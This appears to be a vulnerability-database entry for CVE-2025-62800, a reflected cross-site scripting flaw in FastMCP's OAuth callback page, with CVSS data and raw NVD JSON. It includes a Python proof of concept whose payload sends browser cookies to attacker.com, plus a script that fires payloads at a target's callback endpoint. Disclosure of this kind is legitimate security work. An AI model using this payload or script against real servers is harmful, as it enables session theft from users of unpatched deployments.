CVE-2025-62800

Description

FastMCP is the standard framework for building MCP applications. Versions prior to 2.13.0 have a reflected cross-site scripting vulnerability in the OAuth client callback page (oauth_callback.py) where unescaped user-controlled values are inserted into the generated HTML, allowing arbitrary JavaScript execution in the callback server origin. The issue is fixed in version 2.13.0.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jlowin:fastmcp:*:*:*:*:*:*:*:* - VULNERABLE

FastMCP < 2.13.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-62800 PoC - FastMCP OAuth Callback XSS
# Target: FastMCP < 2.13.0

def generate_xss_payload():
    """
    Generate malicious OAuth callback URL with XSS payload
    """
    # Basic XSS payload to steal cookies
    xss_payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'
    
    # URL encode the payload for use in callback URL
    callback_url = f"http://target-server/oauth/callback?state={xss_payload}&code=legitimate_code"
    
    return callback_url

def exploit(target_url, payload):
    """
    Send malicious callback request to trigger XSS
    """
    malicious_url = f"{target_url}/oauth/callback?state={payload}&code=test_code"
    
    print(f"[*] Sending malicious request to: {malicious_url}")
    
    response = requests.get(malicious_url, allow_redirects=False)
    
    print(f"[*] Response Status: {response.status_code}")
    
    if payload in response.text:
        print("[!] Vulnerability confirmed - XSS payload reflected without sanitization")
        return True
    else:
        print("[*] Payload not found in response")
        return False

if __name__ == "__main__":
    target = "http://vulnerable-fastmcp-server:8000"
    payload = '<script>alert(document.domain)</script>'
    exploit(target, payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62800
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62800
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62800/
[4] VulDB https://vuldb.com/cve/CVE-2025-62800
[5] https://github.com/jlowin/fastmcp/security/advisories/GHSA-mxxr-jv3v-6pgc
[6] https://github.com/jlowin/fastmcp/security/advisories/GHSA-mxxr-jv3v-6pgc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62800", "sourceIdentifier": "[email protected]", "published": "2025-10-28T22:15:36.983", "lastModified": "2025-11-07T01:49:53.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FastMCP is the standard framework for building MCP applications. Versions prior to 2.13.0 have a reflected cross-site scripting vulnerability in the OAuth client callback page (oauth_callback.py) where unescaped user-controlled values are inserted into the generated HTML, allowing arbitrary JavaScript execution in the callback server origin. The issue is fixed in version 2.13.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jlowin:fastmcp:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.13.0", "matchCriteriaId": "938DF638-7486-4DDB-A950-1A16D8FCCEA1"}]}]}], "references": [{"url": "https://github.com/jlowin/fastmcp/security/advisories/GHSA-mxxr-jv3v-6pgc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/jlowin/fastmcp/security/advisories/GHSA-mxxr-jv3v-6pgc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}